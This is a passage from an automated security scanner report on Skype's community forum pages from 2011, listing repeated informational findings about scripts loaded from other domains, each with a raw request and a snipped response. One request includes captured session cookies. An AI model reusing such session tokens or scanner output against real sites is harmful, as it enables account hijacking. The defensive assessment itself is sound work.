User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:53 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 239706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.231. http://community.skype.com/t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:38 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 246101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js"></script>
...[SNIP]...

18.232. http://community.skype.com/t5/Windows/Skype-fails-to-log-me-in/m-p/132356  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Skype-fails-to-log-me-in/m-p/132356

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Skype-fails-to-log-me-in/m-p/132356 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:51 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 105349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.233. http://community.skype.com/t5/Windows/Update-Skype/m-p/132324  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Update-Skype/m-p/132324

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Update-Skype/m-p/132324 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:51 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 107979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.234. http://community.skype.com/t5/Windows/Windows-Beta-5-5-Suggestion/td-p/26642  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Windows-Beta-5-5-Suggestion/td-p/26642

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Windows-Beta-5-5-Suggestion/td-p/26642 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:39 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 65902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.235. http://community.skype.com/t5/Windows/Windows-Crashes-on-Skype-Startup-Login/m-p/134250  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Windows-Crashes-on-Skype-Startup-Login/m-p/134250

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Windows-Crashes-on-Skype-Startup-Login/m-p/134250 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 172067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.236. http://community.skype.com/t5/Windows/bd-p/Windows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/bd-p/Windows

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/bd-p/Windows HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:43 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 204906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.237. http://community.skype.com/t5/Windows/bd-p/Windows/page/75  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/bd-p/Windows/page/75

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/bd-p/Windows/page/75 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:44 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 196902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.238. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 122466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.239. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: community.skype.com
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:01 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 122886
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.240. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/message-uid/24028/highlight/true  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/message-uid/24028/highlight/true

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/message-uid/24028/highlight/true HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:19 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 123047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.241. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 122077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.242. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032/highlight/true  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032/highlight/true

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032/highlight/true HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:19 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 122391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.243. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032/message-uid/24032/highlight/true  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032/message-uid/24032/highlight/true

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032/message-uid/24032/highlight/true HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:20 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 122646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.244. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:31 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 122203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.245. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/highlight/true  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/highlight/true

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/highlight/true HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:21 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 122451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
